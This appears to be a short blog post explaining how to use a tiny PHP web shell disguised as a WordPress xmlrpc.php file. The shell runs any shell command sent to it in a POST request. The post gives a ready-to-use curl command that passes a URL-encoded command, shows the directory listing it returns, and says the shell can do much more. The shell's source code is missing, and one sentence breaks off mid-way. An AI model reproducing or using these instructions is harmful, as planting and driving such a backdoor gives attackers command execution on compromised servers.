Table of Contents
This is one of the smallest backdoors that I am aware of that allows you to run server commands that are sent to it via a POST request.
Its small footprint is due to its use of the backtick operator as a short hand for the PHP function
Use of the backtick operator `` is identical to shell_exec().
shell_exec — Execute command via shell and return the complete output as a string
In order to use such a backdoor all you need to do is submit a POST request to the file containing the minishell. In this example the file is named xmlrpc.php and I submit the POST using the
curl command in bash terminal:
└──╼ curl "localhost/xmlrpc.php" --data-raw "0=ls+-lhart+wordpress/" total 27M -r--r--r-- 1 www-data www-data 31 Aug 14 2019 protecc_me.php -rwxrwxrwt 1 www-data www-data 1.5K Jan 13 2020 1.css -rwxrwxrwt 1 www-data www-data 3.3K Jan 13 2020 bg1.png -rwxrwxrwt 1 www-data www-data 1.6K Feb 24 2020 wp-atom2.php -rwxrwxrwt 1 www-data www-data 0 Feb 24 2020 favicon.ico -rwxrwxrwt 1 www-data www-data 418 Feb 24 2020 index.php-bkup -rwxrwxrwt 1 www-data www-data 162 Mar 8 2020 w.txt ...
Just be sure to include the
0 variable and then your url encoded command that you want to run. The command I used for the example was
ls -lhart wordpress/ but you can do a lot more than just
lsing directories with it.
The only problem is that if there is a firewall in use it should detect and prevent the POST request from going through since it is clearly malicious.